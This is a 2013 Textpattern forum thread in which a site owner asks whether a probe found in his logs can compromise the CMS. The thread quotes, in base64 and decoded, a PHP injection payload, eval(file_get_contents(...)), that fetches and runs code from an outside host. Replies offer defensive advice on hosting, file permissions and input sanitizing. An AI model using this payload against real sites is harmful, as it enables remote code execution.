Textpattern CMS support forum
You are not logged in. Register | Login | Help
- Topics: Active | Unanswered
Pages: 1
Hack probing on my site detected
Here’s what I’ve found last night in logs:
Firstly someone came on my site from http://dr4g0n.name:8080/dokuwiki/doku.php?id=start
,
then from another IP came this request:
?text=eval(base64_decode(ZXZhbChmaWxlX2dldF9jb250ZW50cygnaHR0cDovL2h3LWNhcmdvLnJ1L25ldGNhdF9maWxlcy8xNjcvMS50eHQnKSk7));
Should I arm already?
I also decoded this request from base64 to normal text, here’s command eval(file_get_contents('http://hw-cargo.ru/netcat_files/167/1.txt'));
.
You can check this txt by yourself, its’ just a txt with a list of PHP commands.
So how can I check If my site is affected / infected ?
Last edited by maratnugmanov (2013-03-31 12:54:46)
Offline
Re: Hack probing on my site detected
That doesn’t look like anything specific to Textpattern. It may be a question more appropriate for your web hosting company.
Offline
Re: Hack probing on my site detected
So textpattern is not affected with such request?
Offline
Re: Hack probing on my site detected
maratnugmanov wrote:
So textpattern is not affected with such request?
no mention of Textpattern in the code you posted.
Who is your ISP? i.e. where is your site hosted? have you asked their support staff to investigate.
Empty your log file. and double-check all your permissions on your files.
Do you have comments turned on?
Last edited by bici (2013-04-01 05:16:06)
…. texted postive
Offline
Re: Hack probing on my site detected
I mean that I saw some videos of using vulnerables in Wordpress and Joomla, using such commands, so the question is simple – does textpattern is vulnerable for such attacks?
Comments are on, but I don’t have one – site is too young.
The command looks like this, it contains instructions to include PHP commands. The question is – will textpattern try to execute those?
http://mysite.com/?text=eval(base64_decode(ZXZhbChmaWxlX2dldF9jb250ZW50cygnaHR0cDovL2h3LWNhcmdvLnJ1L25ldGNhdF9maWxlcy8xNjcvMS50eHQnKSk7));
I don’t think I should contact my hoster every time someone tries to use Wordpress hacks on me. They just shouldn’t work.
For example I can try to run this command on your website (which I wouldn’t do, I’m just giving an example), just by adding this to your site URL. Will you immediately contact your hoster? And how can he protect you from this random stuff. He can blacklist some IPs etc, but I don’t think there is much to investigate.
Last edited by maratnugmanov (2013-04-01 08:26:17)
Offline
Re: Hack probing on my site detected
Hi Marat.
If the website you are referring to is hw-cargo.ru
, there are nearly 1,5000 websites on the same web server, so it’s very likely another website has compromised security. If you contact your host, there may be cleanup on other sites that is required. I agree with Giovanni, there is no mention of Textpattern in the code you posted, although since the files
folder has more liberal file permissions it’s possible another website on the same server has found the files folder has 777
permissions and just used that.
I suggest deleting the 1.txt
file, changing the file permissions on the files
folder to 755
until the problem is solved with the rogue site.
Offline
Re: Hack probing on my site detected
This seems like it could affect Textpattern if you are not sanitizing your GET variables, and happen to be using a variable called “text”. :-)
Offline
Re: Hack probing on my site detected
After my request of removing 1.txt
from the first site – it was removed, but no luck – now almost similar request is going from another site. Already wrote on that to possible domain registrator and possible hoster, but this time this is 100% not infected site – this is nest itself – the mainpage of domain has malicious code, and all subdomains too – they want you to install adobe flash player, some scripts changes page address to adobe’s to fool you.
+100 for Textpattern that it not so common as Wordpress – I don’t think that I will be affected any time soon.
Offline
Pages: 1